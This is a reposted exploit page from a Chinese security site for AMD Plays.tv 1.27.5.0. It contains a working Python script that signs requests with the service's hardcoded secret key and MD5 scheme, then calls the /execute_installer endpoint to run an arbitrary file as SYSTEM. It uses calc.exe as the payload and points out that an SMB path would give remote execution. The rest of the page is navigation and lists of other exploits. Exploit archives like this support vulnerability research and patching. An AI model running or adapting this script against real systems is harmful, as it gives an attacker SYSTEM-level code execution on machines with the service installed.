首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution
来源:vfocus.net 作者:Securifera 发布时间:2018-04-19  

########################################################################
http://support.amd.com/en-us/download?cmpid=CCCOffline -
#  Click "Automatically Detect - Download Now"
#  Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
#  OR
#
https://plays.tv/download
#
#  Target OS:   Windows( Any )
#  Privilege:   SYSTEM
#  Type:        Arbitrary File Execution
#
#  Notes:       Second minor bug allows for arbitrary file write of
#               uncontrolled data using the /extract_files path.
#
########################################################################

#!/usr/bin/python3
import urllib.request
import json
import hashlib

def check_svc( path, data ):
     
  #Setup request
  request = urllib.request.Request(addr)

  #add post data
  try:
    resp = urllib.request.urlopen(request, "data".encode("utf-8"))
    return "[-] Not Raptr, Plays TV service"
  except urllib.error.HTTPError as err:
    error_message = err.read().decode("utf-8")
    if error_message == 'Security failed - Missing hash or message[data]':
        return "[+] Raptr, Plays TV service"

def post_req( path, data ):
 
  secret_key = 'a%qs0t33QgiE6ut^0I&Y'
   
  #Setup request
  request = urllib.request.Request(addr)
  json_data = json.dumps(data)
 
  m = hashlib.md5()
  hash_data = path + json_data + secret_key
  m.update(hash_data.encode('utf8'))
  hash_str = m.hexdigest()
 
  #add post data
  p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
  resp = urllib.request.urlopen(request, p_data)
  return resp.read()

#Target IP address
ip = '127.0.0.1'

##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452

##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe"       #Local Execution
data = {
  "installer": cmd,
  "appdata": cmd
}

#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path

#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)

#Exploit service
ret = post_req(path, data)
print(ret)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Brave Browser < 0.13.0 - 'wind
·Drupal < 8.3.9 / < 8.4.6 / < 8
·Brave Browser < 0.13.0 - 'long
·Easy File Sharing Web Server 7
·Facebook Graph Groups Crosswal
·Lutron Quantum 2.0 - 3.2.243 -
·CloudMe Sync 1.11.0 Local Buff
·VX Search 10.6.18 - 'directory
·Facebook Graph Phone Number Me
·Microsoft Internet Explorer 11
·Facebook Graph Metadata Crossw
·Chrome V8 JIT NodeProperties::
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved